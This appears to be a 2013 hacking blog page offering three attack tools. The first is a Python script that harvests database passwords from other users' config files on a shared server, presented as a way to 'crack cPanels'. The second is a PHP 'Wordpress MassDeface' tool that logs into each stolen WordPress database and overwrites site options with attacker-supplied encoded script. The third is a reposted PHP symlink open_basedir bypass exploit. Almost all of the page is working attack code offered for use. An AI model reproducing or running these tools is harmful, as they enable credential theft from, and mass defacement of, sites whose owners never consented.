Tuesday, 21 May 2013

Crack Cpanels With Valide Passwords In Server [PYTHON]



Firstly you must creat folder in C: , for example : C:\a\
and filename.py is the name of script that you are saved onto you PC
so to use the script put this order in CMD :


Code:
filename.py [Configs URL] C:\a
And will get to you all password in configs

[Video] Crack Cpanels With Valide Passwords In Server [PYTHON] By ĦϻǼʑҟҁϼ :
http://devil-zone.net/vb/showthread.php?309-Video-Crack-Cpanels-With-Valide-Passwords-In-Server-PYTHON

http://devil-zone.net/vb/showthread.php?211-Crack-Cpanels-With-Valide-Passwords-In-Server-PYTHON&p=423&viewfull=1#post423



#!/usr/bin/env python

import sys
import os
import re
import subprocess
import urllib
import glob
from platform import system


def banner():
  print '''
`7MMF'   `7MF'OO `7MM"""Mq.`7MMF'   `7MF'.M"""bgd    `7MM"""Yb.   MMM"""AMV
  `MA     ,V  88   MM   `MM. MM       M ,MI    "Y      MM    `Yb. M'   AMV 
   VM:   ,V   ||   MM   ,M9  MM       M `MMb.          MM     `Mb '   AMV  
    MM.  M'   ||   MMmmdM9   MM       M   `YMMNq.      MM      MM    AMV   
    `MM A'    `'   MM  YM.   MM       M .     `MM      MM     ,MP   AMV   ,
     :MM;     ,,   MM   `Mb. YM.     ,M Mb     dM ,,   MM    ,dP'  AMV   ,M
      VF      db .JMML. .JMM. `bmmmmd"' P"Ybmmd"  db .JMMmmmdP'   AMVmmmmMM
      
                          WWW.DEVIL-ZONE.NET
  '''


if len(sys.argv) != 3:
  banner()
  print'''    
    Usage: %s [URL...] [directory...]
        
    Ex) %s http://www.test.com lnx1
  ''' % (sys.argv[0], sys.argv[0])
  sys.exit(1)


site = sys.argv[1]
fout = sys.argv[2]


try:
    req  = urllib.urlopen(site)
    read = req.read()
    if system() == 'Linux':
      f = open('/tmp/data.txt', 'w')
      f.write(read)
      f.close()
    if system() == 'Windows':
      f = open('data.txt', 'w')  
      f.write(read)
      f.close()


    i = 0
    if system() == 'Linux':
      banner()
      f = open('/tmp/data.txt', 'rU')
      for line in f:
        if line.startswith('<li><a') == True :
          m = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m.group(2)
          try:  urllib.urlretrieve(site + m.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<img') == True:
          m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m1.group(2)
          try:  urllib.urlretrieve(site + m1.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<IMG') == True:
          m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m2.group(2)
          try:  urllib.urlretrieve(site + m2.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
      f.close()
    if system() == 'Windows':
      banner()  
      f = open('data.txt', 'rU')
      for line in f:
        if line.startswith('<li><a') == True :
          m = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m.group(2)
          try:  urllib.urlretrieve(site + m.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<img') == True:
          m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m1.group(2)
          try:  urllib.urlretrieve(site + m1.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<IMG') == True:
          m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m2.group(2)
          try:  urllib.urlretrieve(site + m2.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
      f.close()
    if system() == 'Linux':
     cleanup = subprocess.Popen('rm -rf /tmp/data.txt > /dev/null', shell=True).wait()
    if system() == 'Windows':
      cleanup = subprocess.Popen('del C:\data.txt', shell=True).wait()
    print '\n', '-' * 100, '\n'
    if system() == 'Linux':
        for root, dirs, files in os.walk(fout):
          for fname in files:
            fullpath = os.path.join(root, fname)
            f = open(fullpath, 'r')
            for line in f:
              secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
              if secr is not None: print (secr.group(2))  
              secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
              if secr1 is not None:  print  (secr1.group(2))
              secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
              if secr2 is not None: print (secr2.group(3))
              secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
              if secr3 is not None: print (secr3.group(2))
              secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
              if secr4 is not None: print (secr4.group(2))
              secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
              if secr5 is not None: print (secr5.group(2))
              secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
              if secr6 is not None: print (secr6.group(2))
              secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
              if secr7 is not None: print (secr7.group(2))
            f.close()
    if system() == 'Windows':
        for infile in glob.glob( os.path.join(fout, '*.txt') ):
            f = open(infile, 'r')
            for line in f:
              secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
              if secr is not None: print (secr.group(2))  
              secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
              if secr1 is not None:  print  (secr1.group(2))
              secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
              if secr2 is not None: print (secr2.group(3))
              secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
              if secr3 is not None: print (secr3.group(2))
              secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
              if secr4 is not None: print (secr4.group(2))
              secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
              if secr5 is not None: print (secr5.group(2))
              secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
              if secr6 is not None: print (secr6.group(2))
              secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
              if secr7 is not None: print (secr7.group(2))
            f.close()
            
    print '\nCreated by: V!RUS.DZ \n >> PWNRS'
except (KeyboardInterrupt):
    print '\nThanks for using it ._^'
    print '>> http://www.devil-zone.net\n'



























































































































































Posted by at No comments:

Wordpress MassDeface 


<title>Wordpress MassDeface</title>
        <style>
        body
        {
                background: #0f0e0d;
                color: #FF9933;
                padding: 0px;
        }
        a:link, body_alink
        {
                color: #FF9933;
                text-decoration: none;
        }
        a:visited, body_avisited
        {
                color: #FF9933;
                text-decoration: none;
        }
        a:hover, a:active, body_ahover
        {
                color: #FFFFFF;
                text-decoration: none;
        }
        td, th, p, li,table
        {
               
                background: #2e2b28;
                border:1px solid #524f46;
        }
        input
        {
                border: 1px solid;
                cursor: default;
               
                overflow: hidden;
                background: #2e2b28;
                color: #ffffff;
        }textarea
        {
                border: 1px solid;
                cursor: default;
               
                overflow: hidden;
                background: #2e2b28;
                color: #ffffff;
        }
        button
        {
                border: 1px solid;
                cursor: default;
               
                overflow: hidden;
                background: #2e2b28;
                color: #ffffff;
        }
        </style>
        </head>
         
        <body bgcolor="black">
        <center>
        <pre>
        __          __      __  __                 _____        __              
                 / /     |  /  |               |  __       / _|              
            /  / / __   |   / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
           /  / / '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
           \  /\  /| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
            \/  \/ | .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
                   | |                                                          
                   |_|                                                          
        </pre>
        </center>
        <form method="POST" action="" >
        <center>
        <table border='1'><tr><td>List of All Symlink</td><td>
        <input type="text" name="url" size="100" value="list.txt"></td></tr>
        <tr><td>Index</td><td>
        <textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
        <br><br><input type="Submit" name="Submit" value="Submit">
        <input type="hidden" name="action" value="1"></form>
        </center>
        <?
        set_time_limit(0);
        if ($_POST['action']=='1'){
        $url=$_POST['url'];
        $users=@file($url);
         
         
        if (count($users)<1) exit("<h1>No config found</h1>");
        foreach ($users as $user) {
        $user1=trim($user);
        $code=file_get_contents2($user1);
        preg_match_all('|define.*(.*'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
        $db=$b1[1][0];
        preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
        $user=$b2[1][0];
        preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
        $db_password=$b3[1][0];
        preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
        $host=$b4[1][0];
        preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
        $p=$b5[1][0];
         
         
        $d=@mysql_connect( $host, $user, $db_password ) ;
        if ($d){
        @mysql_select_db($db );
        $source=stripslashes($_POST['index']);
        $s2=strToHex(($source));
        $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
        $ls=strlen($s)-2;
        $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
        mysql_query($sql) ;
        $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
        mysql_query($sql) ;
        if (function_exists("mb_convert_encoding") )
        {
        $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
        $source2=mysql_real_escape_string($source2);
        $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
        @mysql_query($sql) ; ;
        $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
        @mysql_query($sql) ; ;
        }
        $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
        $siteurl=@mysql_fetch_array($aa) ;
        $siteurl=$siteurl['option_value'];
        $tr.="$siteurl\n";
        mysql_close();
        }
        }
        if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
        }
        function strToHex($string)
        {
            $hex='';
            for ($i=0; $i < strlen($string); $i++)
            {
                if (strlen(dechex(ord($string[$i])))==1){
                $hex .="%0". dechex(ord($string[$i]));
                        }
                        else
                        {
                        $hex .="%". dechex(ord($string[$i]));
                        }
            }
            return $hex;
        }
         
        function file_get_contents2($u){
         
                $ch = curl_init();
            curl_setopt($ch,CURLOPT_URL,$u);
                curl_setopt($ch, CURLOPT_HEADER, 0);    
           curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
            curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
                    $result = curl_exec($ch);
                return $result ;
                }
               
        ?>














http://devil-zone.net/vb/showthread.php?2072-Archive-of-all-tools-for-Bypass-Symlink&p=9398&viewfull=1#post9398
Posted by at No comments:

All tools for Bypass Symlink

PHP 5.2.12/5.3.1 symlink() open_basedir bypass

 
<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass 
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
    exit;

if(!is_writable("."))
    die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
    if(!file_exists($fakedir))
        mkdir($fakedir);
    chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
        if(!file_exists($hardstyle[$a])) 
            mkdir($hardstyle[$a]);
        chdir($hardstyle[$a]);
        $as++;
    }
}
$as++;
while($as--)
    chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
    else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>




















































Read more »
Posted by at No comments:
Subscribe to: Comments (Atom)